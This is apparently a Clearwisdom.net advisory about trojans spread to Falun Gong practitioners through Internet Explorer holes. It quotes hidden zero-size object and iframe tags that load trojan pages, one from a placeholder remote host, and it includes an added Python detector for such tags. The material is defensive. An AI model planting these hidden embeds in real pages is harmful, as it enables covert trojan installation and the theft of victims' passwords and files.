(Clearwisdom.net) In the recent computer virus attacks against
overseas practitioners, the attackers mainly took advantage of the security
holes in Microsoft Internet Explorer (IE). We recommend that everyone use
another Internet browser, and set it as the default browser. This will greatly
reduce the security risk. Especially for practitioners who are not familiar with
which programs to allow through the firewall to access the Internet, the browser
replacement should be done as soon as possible.
In this article, we will talk more about computer security, especially in the
area of IE security holes.
In the past several years, the computer attacks against Dafa practitioners
have evolved in the following order:
- Attacking overseas Dafa web sites directly from mainland China
- Attacking overseas Dafa web sites through overseas proxies
- Attacking U.S. government web sites using a fake Dafa web site's identity
- Setting up fake overseas proxies to trap Mainland practitioners
- Spreading viruses through practitioners' email. The viruses are mainly the more
popular ones that are currently spread on the Internet.
- Spying on practitioners' email communication, impersonating practitioners'
style, and sending email viruses as attachments.
As practitioners become more and more aware of computer security, especially
being careful about opening email attachments, these tricks are no longer
effective. They have moved on to Trojan viruses to monitor practitioners'
computer activity.
A "Trojan" is a program installed in the computer without the user
knowing. The program automatically starts whenever the computer is turned on. In the
background, it monitors keyboard strokes and records any account name, password,
and address book entries. It also scans all documents and steals useful
information. Then it transmits such information to a remote machine.
Installing Trojans in the past was not easy. It required the user to run a
program (such as by opening an email attachment). But now, with IE security holes,
Trojans can be installed simply by visiting a web page. The evil is taking
advantage of the security hole immediately.
Their attacks have the following characteristics:
- Content:
The email pretends to contain truth clarification information, for example:
"Big Trial" or "Clarify the truth through different
ways". It may say something to arouse people's curiosity, such as
"UFO appears at rocket launch." It may report some internal news,
such as mainland practitioner so-and-so being arrested.
- Web Page Link
In order to install a Trojan, reading the email content is not enough. You
must visit a web page. In the email, it often says, "Please click here
to find out the newest information". This URL leads to a web page where
the Trojan code is located. It mainly exploits the security hole in IE's
embedded object feature. If you view the page's source code (VIEW SOURCE), you
should see some code like this:
<object data="lhxyexe.asp" height=0 width=0>
<object data="lhxyhta.asp" height=0 width=0>
or the code is wrapped around like this:
<iframe src="mm.html" name="id" width="0"
height="0" frameborder="0">
where the code is stored in "mm.html".
The secret is "width=0 height=0". As a result of these settings, the
object is not shown on the web page.
- HTML Attachment
The next, more advanced trick is using an HTML attachment, which people are
generally not suspicious about. However this HTML attachment contains the
Trojan object code. In this case, it must use the complete URL:
<object data="http://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0
width=0>
- Moving the Trojan code server overseas
At the beginning, the Trojan code was located at China-based websites. We
have found such servers in Shanghai, Shandong, etc. They also use some
well-known Chinese web sites to forward the user to their server. For
example, it may use the Net Ease website http://abckdkd.nease.net.
Because Net Ease provides a domain name forward service, the user is
forwarded to the server with the Trojan code.
With a firewall installed, you need to be very careful if your computer tries
to visit a Chinese IP address without reason. Lately they have set up web
sites outside China. We recently found one in the U.S. and one in East Asia.
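The hidden-object pattern described under "Web Page Link" and "HTML Attachment" above can be checked for before a page or attachment is opened in a browser. The following is an added example, not code from the original article: it flags object and iframe tags whose width or height is zero (slightly broader than the article's case, where both are zero). The names find_hidden_embeds, HiddenEmbedFinder and SAMPLE are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tag -> attribute naming the content to load (the two tags shown in the article).
EMBED_TAGS = {"object": "data", "iframe": "src"}
ZERO = re.compile(r"0+(\.0+)?(px|%)?")


def is_zero(value):
    """True when a width/height attribute is present and equals zero."""
    return value is not None and ZERO.fullmatch(value.strip().lower()) is not None


class HiddenEmbedFinder(HTMLParser):
    """Collects <object>/<iframe> start tags whose width or height is zero."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        attr = dict(attrs)
        if not (is_zero(attr.get("width")) or is_zero(attr.get("height"))):
            return
        target = attr.get(EMBED_TAGS[tag]) or ""
        self.findings.append({
            "line": self.getpos()[0],
            "tag": tag,
            "target": target,
            # A complete URL is what the article says an HTML attachment must use.
            "remote": urlparse(target).scheme in ("http", "https"),
        })


def find_hidden_embeds(html_text):
    """Return one finding per zero-sized embedded object or frame."""
    parser = HiddenEmbedFinder()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample: the three snippets quoted in the article plus one visible frame.
SAMPLE = """<html><body>
<p>Please click here to find out the newest information</p>
<object data="lhxyexe.asp" height=0 width=0></object>
<iframe src="mm.html" name="id" width="0" height="0" frameborder="0"></iframe>
<object data="http://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0 width=0></object>
<iframe src="video.html" width="640" height="480"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_embeds(SAMPLE):
        print(finding)
```

An empty result only means this one pattern is absent; elements hidden through style sheets or script are outside what this check looks at.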
How can we protect ourselves?
The answer is rather simple. So far all of these tricks exploit security
holes in IE. Other good Internet browsers include Mozilla and Netscape. Mozilla's
installation is simple. Please visit www.mozilla.com
The key point is that Mozilla must be set as the default browser in the
computer. So when you click a URL in an email, the popup window is Mozilla-based
instead of IE-based.
Mozilla is not supported well in some multimedia web sites. In those cases,
if you are sure that the web site is safe, you may use IE to visit.
In summary, currently, discontinuing the use of IE is the best way to avoid
Trojans. Please pay special attention to this matter.